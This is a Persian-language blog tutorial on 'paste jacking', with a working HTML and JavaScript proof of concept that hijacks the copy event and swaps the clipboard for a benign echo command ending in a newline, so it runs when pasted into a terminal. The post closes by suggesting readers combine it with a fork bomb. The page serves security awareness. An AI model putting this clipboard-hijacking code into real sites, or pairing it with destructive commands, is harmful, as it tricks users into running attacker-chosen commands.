امنیتتست نفوذ

حمله Paste Jacking

احتمالاً تا به حال برایتان پیش آمده که بخواهید از روی یه صفحه اینترنتی چیزی را کپی کنید و یک جای دیگر Paste نمایید. به ویژه در فرم‌هایی که از شما دو مرتبه تقاضای ایمیل می کنند. یا برای خیلی از لینوکس کارها و آنهایی که می خواهند Command را از اینترنت کپی کرده و در ترمینالشان پیست نمایند و احیاناً خیلی سریع هم Enter را میزنند. طبق تحقیقات گروه پژوهشی آفسک احتمال هک شدن شما با این تکنیک بسیار بالا می باشد.

آشنایی با حمله ای Paste Jacking

هنگامی که CTRL + C را روی صفحه کلید خود فشار می دهید، تا یک متنی را کپی کنید این متن کپی شده در کلیپ بورد شما قرار میگیرد حال اگر سایتی بخواهد به سادگی میواند با انجام یک کد جاوا اسکریپت ساده این متن را در کلیپ بورد به سادگی تغییر دهد و به محتوایی که خود دوست دارد تغییر دهد حال اگر یک دستور کامند خطرناک باشد که واویلا

 

خب اجازه دهید تا با یک مثال عملی این سناریو را برای شما نمایش دهیم :

به وسیله Notepad یک سند جدید درست کنید سپس کدهای مربوطه را داخل آن کپی پیست نمایید نترسید تا اینجای کار خطری شما را تهدید نمیکند. (:

بعد از این کار این سند را به صورت html ذخیره نمایید (فقط کافیه موقع ذخیره کردن پسوند txt را حذف و سپس از عبارت html به جای آن استفاده کنید به همین سادگی)

<html>
<head>
    <title>Pastejacking exploit example</title>
    <meta name=viewport content="width=device-width, initial-scale=1">    
</head>

    <body>
    To test the pastejacking copy the text from this page and try to execute on your terminal.
        </br>

        <p>Copy:  echo "this is a text for copy."</p>
        <script>
            document.addEventListener('copy', function(e){
                console.log(e);
                e.clipboardData.setData('text/plain', 'echo \' ***** kaliboys ****\t\'\r\n');
                e.preventDefault();
            });
        </script>
    </body>

</html>

 

حال فکر کنین به جای یک دستور جز echo یک دستور حیاتی وارد میشد. چه بلایی سرتون میومد؟

واسه تمرین حالا میتونید این آموزش رو با fork bomb قاطی کنین (:

یوسف وفایی

فارغ التحصیل کارشناسی IT، علاقه مند به برنامه نویسی و علم امنیت، عاشق یادگیری حرفه های جدید، کنجکاو برای همه چیز، همچنین همیشه تلاش میکنم تا به هدفم برسم...

یک نظر

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا